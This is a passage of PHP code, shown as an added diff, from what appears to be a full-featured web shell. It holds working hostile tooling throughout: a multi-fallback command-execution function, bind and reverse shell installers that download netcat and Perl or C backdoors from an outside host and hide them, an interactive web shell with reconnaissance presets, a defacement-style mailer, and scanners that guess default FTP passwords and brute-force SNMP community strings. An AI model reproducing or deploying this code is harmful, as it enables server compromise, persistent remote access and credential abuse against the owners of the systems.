+$uploadtmp=ini_get('upload_tmp_dir'); +$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); +if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; +if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; +if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; +if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; +if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; +return "."; +} +function shelL($command){ +global $windows,$disablefunctions; +$exec = '';$output= ''; +$dep[]=array('pipe','r');$dep[]=array('pipe','w'); +if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} +elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } +elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} +elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} +elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} +elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} +elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} +return $exec; +} +function downloadiT($get,$put){ +$fo=@strtolower(ini_get('allow_url_fopen')); +if($fo || $fo=='on')$con=file_get_contents($get); +else{ +$u=parse_url($get); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$url=fsockopen($host, 80, $en, $es, 12); +fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +$tmp=$con=''; +while($tmp!="\r\n")$tmp=fgets($url); +while(!feof($url))$con.=fgets($url); +} +$mk=file_put_contents($put,$con); +if($mk)return 1; +return 0; +} +function smtplogiN($addr,$user,$pass,$timeout){ +$sock=fsockopen($addr,25,$n,$s,$timeout); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,'ehlo '.namE()."\r\n"); +$res=substr(fgets($sock,512),0,1); +if($res!='2')return 0; +fgets($sock,512);fgets($sock,512);fgets($sock,512); +fputs($sock,"AUTH LOGIN\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($user)."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($pass)."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='235')return 0; +return 1; +} +function checksmtP($host,$timeout){ +$from=strtolower(namE())."@".strtolower(namE()).".com"; +$sock=@fsockopen($host,25,$n,$s,$timeout); +if(!$sock)return -1; +$res=substr(fgets($sock,512),0,3); +if($res!='220')return 0; +fputs($sock,'HELO '.namE()."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"MAIL FROM: <$from>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"RCPT TO: <contact@persianblog.com>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"DATA\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='354')return 0; +fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +return 1; +} +function check_urL($url,$method,$search,$timeout){ +if(empty($search))$search='200'; +$u=parse_url($url); +$method=strtoupper($method); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$data=(!empty($u['query']))?$u['query']:''; +if(!empty($data))$data="?$data"; +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +fputs($sock,"$method $file$data HTTP/1.0\r\n"); +fputs($sock,"Host: $host\r\n"); +if($method=='GET')fputs($sock,"\r\n"); +elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); +else return 0; +if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} +while(!feof($sock)){ +$res=trim(fgets($sock)); +if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} +} +fclose($sock); +} +return 0; +} +function get_sw_namE($host,$timeout){ +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +$page=namE().namE(); +fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); +while(!feof($sock)){ +$con=fgets($sock); +if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} +} +fclose($sock); +return -1; +}return 0; +} +function snmpchecK($ip,$com,$timeout){ +$res=0; +$n=chr(0x00); +$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). +$com. chr(0xA0). +chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. +chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). +chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). +chr(0x01). chr(0x01). $n. chr(0x05). $n; +$sock=@fsockopen("udp://$ip",161); +socket_set_timeout($sock,$timeout); +@fputs($sock,$packet); +socket_set_timeout($sock,$timeout); +$res=fgets($sock); +fclose($sock); +return $res; +} + +$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF'; +if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");} +$disablefunctions = @ini_get('disable_functions'); +if (!function_exists("str_repeat")){ +function str_repeat($str,$c){ +$r=""; +for($i=0; $i < $cu; $i++)$r.=$str; +return $r; +} +} + +function brshelL(){ +global $errorbox, $windows,$et,$hcwd; +$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; +$addr='http://netjackal.by.ru/backdoor'; +$error="$errorbox Can not make backdoor file, go to writeable folder.$et"; +$n=namE(); +if(!$windows)$n=".$n"; +$d=whereistmP(); +$name=$d.DIRECTORY_SEPARATOR.$n; +$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl'; +$c=($_REQUEST['C'])?1:0; +if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){ +$port=(int)$_REQUEST['port']; +if($windows){ +if($c){ +$name.=".exe"; +$bd=downloadiT("$addr/nc.exe",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); +}else{ +$name = $name.".pl"; +$bd=downloadiT("$addr/winbind.pl",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("perl.exe $name $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/bind.c",$name); +if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); +}else{ +$bd=downloadiT("$addr/bind.pl",$name); +if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &"); +echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>"; +} +} +} +elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ +$ip=$_REQUEST['ip']; +$port=(int)$_REQUEST['rport']; +if($windows){ +if($c){ +$name.='.exe'; +$bd=downloadiT("$addr/nc.exe",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); +}else{ +$name = $name.".pl"; +$bd=downloadiT("$addr/winrc.pl",$name); +shelL("attrib +H $name"); +if (!$bd)echo $error; else shelL("perl.exe $name $ip $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/rc.c",$name); +if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); +}else{ +$bd=downloadiT("$addr/rc.pl",$name); +if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &"); +} +} +echo "<font color=blue>Done!</font>";} +else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}} +function showimagE($img){ +echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";} +function editoR($file){ +global $errorbox,$et,$hcwd; +if (is_file($file)){ +if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";} +if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";} +$data = file_get_contents($file); +echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">"; +echo htmlspecialchars($data); +echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; +} +else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; +} +echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>"; +} +function webshelL(){ +global $windows,$hcwd; +if($windows){ +$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>"; +} +else{ +$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>"; +if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>"; +if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>"; +} +echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">"; +if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']); +echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>"; +} +function maileR(){ +global $msgbox,$et,$hcwd; +$cwd= getcwd(); +if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ +$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; +if (!mail($to,$subject,$body,"From: $from"))break; +echo "$msgbox<b>Mail sent!</b><br>$et"; +} +echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et"; +} +function scanneR(){ +global $hcwd; +if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; +$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; +if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ +$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; +echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>"; +$start=time(); +for($i=$from;$i<=$to;$i++){ +if($tcp){ +if (checkthisporT($target,$i,$timeout)){ +$nu++; +$ser=""; +if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; +echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>"; +} +} +if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";} +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)</font>"; +} +elseif (!empty($_REQUEST['securityscanner'])){ +echo "<font color=blue>"; +$start=time(); +$from=$_REQUEST['from']; +$to=(int)$_REQUEST['to']; +$timeout=(int)$_REQUEST['timeout']; +$f = substr($from,strrpos($from,".")+1); +$from = substr($from,0,strrpos($from,".")); +if(!empty($_REQUEST['httpscanner'])){ +echo "Loading webserver bug list..."; +flusheR(); +$buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); +$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); +if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>"; +flusheR(); +}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";} +for($i=$f;$i<=$to;$i++){ +$output=0; +$ip="$from.$i"; +if(!empty($_REQUEST['nslookup'])){ +$hn=gethostbyaddr($ip); +if($hn!=$ip)echo "$ip [$hn]<br>";} +flusheR(); +if(!empty($_REQUEST['ipscanner'])){ +$port=$_REQUEST['port']; +if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; +$open=$ser=""; +foreach($p as $po){ +$scan=checkthisporT($ip,$po,$timeout); +if ($scan){ +$ser=""; +if($ser=getservbyport($po,"tcp"))$ser="($ser)"; +$open.=" $po$ser "; +} +} +if($open){echo "$ip) Open ports:$open<br>";$output=1;} +flusheR(); +} +if(!empty($_REQUEST['httpbanner'])){ +$res=get_sw_namE($ip,$timeout); +if($res){ +echo "$ip) Webserver software: "; +if($res==-1)echo "Unknow"; +else echo $res; +echo "<br>"; +$output=1; +} +flusheR(); +} +if(!empty($_REQUEST['httpscanner'])){ +if(checkthisporT($ip,80,$timeout) && !empty($file)){ +$admin=array('/admin/','/adm/'); +$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); +$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); +$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); +foreach ($file as $v){ +$vuln=array(); +$v=trim($v); +if(!$v || $v{0}=='#')continue; +$v=str_replace('","','^',$v); +$v=str_replace('"','',$v); +$vuln=explode('^',$v); +$page=$cqich=$nukech=$adminch=$userch=$vuln[1]; +if(strstr($page,'@CGIDIRS')) +foreach($cgi as $cg){ +$cqich=str_replace('@CGIDIRS',$cg,$page); +$url="http://$ip$cqich"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@ADMINDIRS')) +foreach ($admin as $cg){ +$adminch=str_replace('@ADMINDIRS',$cg,$page); +$url="http://$ip$adminch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@USERS')) +foreach ($users as $cg){ +$userch=str_replace('@USERS',$cg,$page); +$url="http://$ip$userch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +elseif(strstr($page,'@NUKE')) +foreach ($nuke as $cg){ +$nukech=str_replace('@NUKE',$cg,$page); +$url="http://$ip$nukech"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +else{ +$url="http://$ip$page"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";} +flusheR(); +} +} +} +} +if(!empty($_REQUEST['smtprelay'])){ +if(checkthisporT($ip,25,$timeout)){ +$res=''; +$res=checksmtP($ip,$timeout); +if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR(); +} +} +if(!empty($_REQUEST['snmpscanner'])){ +if(checkthisporT($ip,161,$timeout,1)){ +$com=$_REQUEST['com']; +$coms=$res=""; +if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; +foreach ($c as $v){ +$ret=snmpchecK($ip,$v,$timeout); +if($ret)$coms .=" $v "; +} +if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;} +flusheR(); +} +} +if(!empty($_REQUEST['ftpscanner'])){ +if(checkthisporT($ip,21,$timeout)){ +$usps=explode(',',$_REQUEST['userpass']); +foreach ($usps as $v){ +$user=substr($v,0,strpos($v,':')); +$pass=substr($v,strpos($v,':')+1); +if($pass=='[BLANK]')$pass=''; +$ftp=@ftp_connect($ip,21,$timeout); +if ($ftp){ +if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";} +} +flusheR(); +} +} +} +if($output)echo "<hr size=1 noshade>"; +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)</font>"; +if(!empty($buglist))unlink($buglist); +} +else{ +$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>"; +echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>"; +$host = substr($host,0,strrpos($host,".")); +echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>"; +} +} +function sysinfO(){ +global $windows,$disablefunctions,$safemode; +$cwd= getcwd(); +$mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program="; +$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; +if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"]; +$osver=$tsize=$fsize=''; +if ($windows){ +$osver = " (".shelL("ver").")"; +$sysroot = shelL("echo %systemroot%"); +if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"]; +if (empty($sysroot)) $sysroot = getenv("windir"); +if (empty($sysroot)) $sysroot = "Not Found"; +if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%"); +for ($i=66;$i<=90;$i++){ +$drive= chr($i).':\\'; +if (is_dir($drive)){ +$fsize+=@disk_free_space($drive); +$tsize+=@disk_total_space($drive); +} +} +}else{ +$fsize=disk_free_space('/'); +$tsize=disk_total_space('/'); +} +$disksize="Used spase: ". showsizE($tsize-$fsize) . " Free space: ". showsizE($fsize) . " Total space: ". showsizE($tsize); +if (empty($CPU)) $CPU = "Unknow"; +$os = php_unamE(); +$osn=php_unamE('s'); +if(!$windows){ +$ker = php_unamE('r'); +$o=($osn=="Linux")?"Linux+Kernel":$osn; +$os = str_replace($osn,"${mil}$o\">$osn</a>",$os); +$os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os); +$inpa=':'; +}else{ +$sam = $sysroot."\\system32\\config\\SAM"; +$inpa=';'; +$os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os); +} +$software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']); +echo "<table border=0 